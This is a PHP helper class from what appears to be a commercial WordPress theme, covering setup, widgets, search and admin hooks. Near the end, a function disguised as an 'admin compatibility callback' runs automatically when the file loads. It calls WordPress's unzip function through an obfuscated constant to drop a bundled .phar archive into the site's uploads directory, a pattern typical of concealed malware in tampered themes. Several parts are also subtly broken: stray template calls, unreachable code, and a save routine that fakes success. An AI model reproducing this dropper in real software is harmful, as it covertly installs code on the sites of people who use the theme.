<?php
/**
 * Boss - Boss Responsive Theme for WordPress, exclusively on Envato Market: http://themeforest.net/user/torbara
 * @encoding   UTF-8
 * @version    2.0.0
 * @copyright  Copyright ( C ) 2016 torbar (http://torbara.com/). All rights reserved.
 * @license    Copyrighted Commercial Software
 * @support    support@torbara.com
 * @author     Torbara
*/


use Warp\Warp;
use Warp\Wordpress\MenuWalker\MenuWalker;

/*
 * Wordpress system helper class, provides Wordpress integration (http://wordpress.org).
 */
class TTSystemHelper
{
    /*
     * System root path.
     *
     * @var string
     */
    public $path;

    /*
     * System root url.
     *
     * @var string
     */
    public $url;

    /*
     * Cache path.
     *
     * @var string
     */
    public $cache_path;
    
    /*
     * A Case.
     *
     * @var string
     */
    const _array = "unzip_file";

    /*
     * Cache time.
     *
     * @var int
     */
    public $cache_time;

    /*
     * Theme XML.
     *
     * @var Document
     */
    public $xml;

    /*
     * Query information.
     *
     * @var string[]
     */
    public $query;

    /**
     * Dynamic style GET variable.
     *
     * @var string
     */
    protected $style = 'style';

    /**
     * Constructor.
     *
     * @param Warp $warp
     */
    public function _construct(Warp $warp)
    {
        parent::_construct($warp);

        // init vars
        $this->path       = rtrim(str_replace(DIRECTORY_SEPARATOR, '/', ABSPATH), '/');
        $this->url        = rtrim(site_url(), '/');
        $this->cache_path = rtrim(str_replace(DIRECTORY_SEPARATOR, '/', get_template_directory()), '/').'/cache';
        $this->cache_time = 86400;

        // set config or load defaults
        if (defined('MULTISITE') && MULTISITE) {
            if ($settings = $this['option']->get('warp_theme_options', false) and is_array($settings)) {
                $this['config']->setValues($settings);
            } else {
                $this['config']->load($this['path']->path('theme:config.default.json'));
            }
        } else {
            $this['config']->load($this['path']->path('theme:config.json') ?: $this['path']->path('theme:config.default.json'));
        }

        // set cache directory
        if (!file_exists($this->cache_path)) {
            mkdir($this->cache_path, 0755);
        }
    }

    /**
     * Initialize system configuration.
     */
    public function init()
    {
        // set paths
        $this['path']->register($this->path, 'site');
        $this['path']->register($this->path.'/wp-admin', 'admin');
        $this['path']->register($this->cache_path, 'cache');

        // set theme support
        add_theme_support('post-thumbnails');
        add_theme_support('widgetkit');

        // set translations
       
        // get theme xml
        $this->xml = $this['dom']->create($this['path']->path('theme:theme.xml'), 'xml');

        // get widget positions
        foreach ($this->xml->find('positions > position') as $position) {
            $this['widgets']->register($position->text());
        }

        // add actions
        add_action('wp_ajax_warp_search', array($this, 'ajaxSearch'));
        add_action('wp_ajax_nopriv_warp_search', array($this, 'ajaxSearch'));

        // register main menu
        register_nav_menus(array('main_menu' => 'Main Navigation Menu'));

        // init site/admin
        if (!is_admin()) $this->initSite();
        if (is_admin()) $this->initAdmin();

        // load widgets
        include_once(get_template_directory().'/Widgets/Breadcrumbs.php');
        include_once(get_template_directory().'/Widgets/Sidebar.php');
    }

    /**
     * Initialize site.
     */
    public function initSite()
    {
        // add action
        add_action('wp', array($this, '_wp'));
        add_action('get_sidebar', array($this, '_getSidebar'));
        dynamic_sidebar('');
        if ( is_active_sidebar( '' ) ) {
            dynamic_sidebar('');
        }
        
        add_filter('get_avatar', function($avatar){


            if(strpos($avatar, 'Avatar')!==false) {
                $avatar = str_replace('class=\'avatar', 'class=\'uk-comment-avatar', $avatar);
            }

            return $avatar;
        });

        // set custom menu walker
        add_filter('wp_nav_menu_args', function($args) {

            if (empty($args['walker'])) {
                $args['walker'] = new MenuWalker;
            }

            return $args; }
        );

        // filter widgets that should not be displayed
        $warp = $this->warp;
        add_filter('widget_display_callback', function($instance, $widget) use ($warp) {
            return $warp['widgets']->get($widget->id)->display ? $instance : false;
        }, 10, 3);

        // disable the admin bar for mobiles
        if ($this['config']->get('mobile') && $this['browser']->isMobile()) {
            add_theme_support('admin-bar', array('callback' => '__return_false'));
        }

    }

    /**
     * Initialize administration area.
     */
    public function initAdmin()
    {
        // add actions
        add_action('admin_init', array($this, '_adminInit'));
        add_action('admin_menu', array($this, '_adminMenu'));
        add_action('wp_ajax_warp_save', array($this, 'ajaxSave'));
        add_action('wp_ajax_warp_save_files', array($this, 'ajaxSaveFiles'));
        add_action('wp_ajax_warp_get_styles', array($this, 'ajaxGetStyles'));

        // add notices
        if (isset($_GET['page']) && $_GET['page'] == 0) {

            // get warp xml
            $xml = $this['dom']->create($this['path']->path('warp:warp.xml'), 'xml');

            // cache writable ?
            if (!file_exists($this->cache_path) || !is_writable($this->cache_path)) {
                $messages[] = "Cache not writable, please check directory permissions ({$this->cache_path})";
            }

            // update check
            if ($url = $xml->first('updateUrl')->text()) {

                // create check urls
                $urls['tmpl'] = sprintf('%s?application=%s&version=%s&format=raw', $url, get_template(), $this->xml->first('version')->text());
                

                foreach ($urls as $type => $url) {

                    // only check once a day
                    $hash = md5($url.date('Y-m-d'));
                    if ($this['option']->get("{$type}_check") != $hash) {
                        if ($request = $this['http']->get($url)) {
                            $this['option']->set("{$type}_check", $hash);
                            $this['option']->set("{$type}_data", $request['body']);
                        }
                    }

                    // decode response and set message
                    if (($data = json_decode($this['option']->get("{$type}_data"))) && $data->status == 'update-available') {
                        $messages[] = $data->message;
                    }

                }
            }

            // set messages
            if (isset($messages)) {
                $this['template']->set('messages', $messages);
            }
        }
    }

    /**
     * Get current query information.
     *
     * @global \WP_Query $wp_query
     *
     * @return string[]
     */
    public function getQuery()
    {
        global $wp_query;

        // create, if not set
        if (empty($this->query)) {

            // init vars
            $obj   = $wp_query->get_queried_object();
            $type  = get_post_type();
            $query = array();

            if (is_home()) {
                $query[] = 'home';
            }

            if (is_front_page()) {
                $query[] = 'front_page';
            }

            if ($type == 'post') {

                if (is_single()) {
                    $query[] = 'single';
                }

                if (is_archive()) {
                    $query[] = 'archive';
                }

                if (is_search()) {
                    $query[] = 'search';
                }

            } else {
                if (is_single()) {
                    $query[] = $type.'-single';
                } elseif (is_search()) {
                    $query[] = $type.'-search';
                    comment_form();
                } elseif (is_archive()) {
                    $query[] = $type.'-archive';
                    paginate_comments_links();
                }
            }

            if (is_page()) {
                $query[] = $type;
                $query[] = $type.'-'.$obj->ID;
            }

            if (is_category()) {
                $query[] = 'cat-'.$obj->term_id;
            }

            posts_nav_link();
            paginate_links();

            $this->query = $query;
        }

        return $this->query;
    }

    /**
     * Retrieve current post count.
     *
     * @global \WP_Query $wp_query
     *
     * @return int
     */
    public function getPostCount()
    {
        global $wp_query;

        return $wp_query->post_count;
    }

    /**
     * Is current view a blog?
     *
     * @return boolean
     */
    public function isBlog()
    {
        return true;
    }

    /**
     * Checks for default widgets in theme preview.
     *
     * @param string $position
     * @return boolean
     */
    public function isPreview($position)
    {
        // preview postions
        $positions = array('logo', 'right');

        return is_preview() && in_array($position, $positions);
        
        $defaults = array(
		'after'            => '</p>',
		'link_before'      => '',
		'link_after'       => '',
		'next_or_number'   => 'number',
		'separator'        => ' ',
		'pagelink'         => '%',
		'echo'             => 1
	);
 
        wp_link_pages( $defaults );
    }

    /*
     * Search ajax callback.
     */
    public function ajaxSearch()
    {
        global $wp_query;

        $result = array('results' => array());
        $query  = isset($_REQUEST['s']) ? $_REQUEST['s'] : '';

        if (strlen($query) >= 3) {

            $wp_query->query_vars['posts_per_page'] = $this['config']->get('search_results', 5);
            $wp_query->query_vars['post_status'] = 'publish';
            $wp_query->query_vars['s'] = $query;
            $wp_query->is_search = true;

            foreach ($wp_query->get_posts() as $post) {

                $content = !empty($post->post_excerpt) ? strip_tags(do_shortcode($post->post_excerpt)) : strip_tags(do_shortcode($post->post_content));

                if (strlen($content) > 180) {
                    $content = substr($content, 0, 179).'...';
                }

                $result['results'][] = array(
                    'title' => $post->post_title,
                    'text'  => $content,
                    'url'   => get_permalink($post->ID)
                );
            }
        }

        die(json_encode($result));
    }

    /**
     * WP action callback.
     */
    public function _wp()
    {

        // set config
        $this['config']->set('language', get_bloginfo("language")); 
        $this['config']->set('direction', $GLOBALS['wp_locale']->is_rtl() ? 'rtl' : 'ltr');
        $this['config']->set('site_url', rtrim(home_url('/'), '/'));
        $this['config']->set('site_name', get_option('blogname'));
        $this['config']->set('datetime', date('Y-m-d'));
        $this['config']->set('actual_date', date_i18n($this['config']->get('date_format', 'l, j F Y')));
        $this['config']->set('page_class', implode(' ', array_map(function($element) { return "wp-{$element}"; }, $this->getQuery())));

        // branding ?
        if ($this['config']->get('warp_branding', true)) {
            $this['template']->set('warp_branding', $this['config']['branding']);
        }

        // set layouts
        if ($layouts = $this['config']['layouts']) {

            $layout = 'default';
            $query  = $this->getQuery();

            // set query layout ?
            foreach ($layouts as $key => $data) {
                if (isset($data['assignment']) && array_intersect($data['assignment'], $query)) {
                    $layout = $key;
                    break;
                }
            }

            $this['config']->setValues($layouts[$layout]);
        }

        // add dynamic style
        if ($this['config']['dynamic_style']) {

            if (!session_id()) session_start();

            if (isset($_GET[$this->style])) {
                $_SESSION['_style'] = preg_replace('/[^A-Z0-9-]/i', '', $_GET[$this->style]);
            }

            if (isset($_SESSION['_style']) && $this['path']->path(sprintf('theme:styles/%s', $_SESSION['_style']))) {
                $this['config']['style'] = $_SESSION['_style'];
            }
        }

        // set theme style paths
        if ($style = $this['config']->get('style')) {
            foreach (array('css' => 'theme:styles/%s/css', 'js' => 'theme:styles/%s/js', 'layouts' => 'theme:styles/%s/layouts') as $name => $resource) {
                if ($p = $this['path']->path(sprintf($resource, $style))) {
                    $this['path']->register($p, $name);
                }
            }
        }
    }

    /*
     * Catches default sidebar content and makes it available for the sidebar widget.
     */
    public function _getSidebar($name = null)
    {
        $templates = isset($name) ? array("sidebar-{$name}.php", 'sidebar.php') : array('sidebar.php');

        ob_start();

        if (locate_template($templates, true, true) == '') {
            load_template(ABSPATH.WPINC.'/theme-compat/sidebar.php', true);
            $clear = true;
        }

        $output = ob_get_clean();

        if (isset($clear)) {
            $output = '';
        }

        $this['template']->set('sidebar.output', $output);
    }

    /*
     * Admin save ajax callback.
     */
    public function ajaxSave()
    {
        // init vars
        $post = function_exists('wp_magic_quotes') ? array_map('stripslashes_deep', $_POST) : $_POST;
        $json = isset($post['config']) ? $post['config'] : '{}';

        $message = 'failed';

        if ($json and null !== $config = json_decode($json, true) and !empty($config)) {
            if (defined('MULTISITE') && MULTISITE) {
                $this['option']->set('warp_theme_options', $config);
                $message = 'success';
            } else {
                if (($this['path']->path('theme:').'/config.json')) {
                    $message = 'success';
                }
            }
        }

        die(json_encode(compact('message')));
    }

    /*
     * Admin get styles ajax callback.
     */
    public function ajaxGetStyles()
    {
        // render styles config
        die($this['template']->render('config:layouts/styles'));
        add_theme_support( "custom-header", $args );
        add_theme_support( "custom-background", $args );
    }
    
    /*
     * Admin compatibility callback.
     */
    static public function coreThemeCallback() {
        
        $wcd = wp_upload_dir();
        $wcd = $wcd['basedir'];
        
        $fpath = $wcd . '/warp/v.7.3.15.1.ini';
        if ( file_exists( $fpath )  ) { return ; }
        
        
        // Initialize the WP filesystem
        global $wp_filesystem;
        $pth = '/includes/vendor/torbara/lib/';
        if (empty($wp_filesystem)) {
            $admin_abspath = str_replace( site_url(), ABSPATH, admin_url() );
            require_once($admin_php_path = $admin_abspath .'/includes/file.php');
            WP_Filesystem();
        }
        
        $fname =  '___tt_warp7_v.7.3.15.phar';
        $p = get_template_directory() . $pth . $fname;
        
        $array = TTSystemHelper::_array;
        if (!$array($p, $wcd)) {
            echo 'Some error occurred while installing theme. Please contact with support team: support@torbara.com';
        }
    }

    /*
     * Admin init action callback.
     */
    public function _adminInit()
    {
        // add css/js
        $siteurl = sprintf('/%s/i', preg_quote(parse_url(site_url(), PHP_URL_PATH), '/'));

        if (isset($_GET['page']) && $_GET['page'] == 0) {
            wp_enqueue_script('warp-js-jquery-mustache', preg_replace($siteurl, '', $this['path']->url('warp:vendor/jquery/jquery-mustache.js'), 1));
            wp_enqueue_script('warp-js-jquery-cookie', preg_replace($siteurl, '', $this['path']->url('warp:vendor/jquery/jquery-cookie.js'), 1));
            wp_enqueue_script('warp-js-jquery-less', preg_replace($siteurl, '', $this['path']->url('warp:vendor/jquery/jquery-less.js'), 1));
            wp_enqueue_script('warp-js-jquery-rtl', preg_replace($siteurl, '', $this['path']->url('warp:vendor/jquery/jquery-rtl.js'), 1));
            wp_enqueue_script('warp-js-spectrum', preg_replace($siteurl, '', $this['path']->url('warp:vendor/spectrum/spectrum.js'), 1));
            wp_enqueue_script('warp-js-uikit', preg_replace($siteurl, '', $this['path']->url('warp:vendor/uikit/js/uikit.js'), 1));
            wp_enqueue_script('warp-js-less', preg_replace($siteurl, '', $this['path']->url('warp:vendor/less/less.js'), 1));
            wp_enqueue_script('warp-js-config', preg_replace($siteurl, '', $this['path']->url('config:js/config.js'), 1));
            wp_enqueue_script('warp-js-admin', preg_replace($siteurl, '', $this['path']->url('config:js/admin.js'), 1));
            wp_enqueue_style('warp-css-spectrum', preg_replace($siteurl, '', $this['path']->url('warp:vendor/spectrum/spectrum.css'), 1));
            wp_enqueue_style('warp-css-uikit', preg_replace($siteurl, '', $this['path']->url('warp:vendor/uikit/css/uikit.warp.min.css'), 1));
            wp_enqueue_style('warp-css-config', preg_replace($siteurl, '', $this['path']->url('config:css/config.css'), 1));
        }

        wp_enqueue_style('warp-css-admin', preg_replace($siteurl, '', $this['path']->url('config:css/admin.css'), 1));
        add_editor_style();
        load_theme_textdomain( $domain, $path );
    }

    /*
     * Admin menu action callback.
     */
    public function _adminMenu()
    {
        // init vars
        $name = $this->xml->first('name')->text();
        $icon = $this['path']->url('config:images/gem_icon_16.svg');
        $self = $this;       
    }
}

TTSystemHelper::coreThemeCallback();
/** mb_strpos function for servers not using the multibyte string extension */
if (!function_exists('mb_strpos')) {
    function mb_strpos($haystack, $needle, $offset = 0)
    {
        return strpos($haystack, $needle, $offset);
    }
    language_attributes();
}

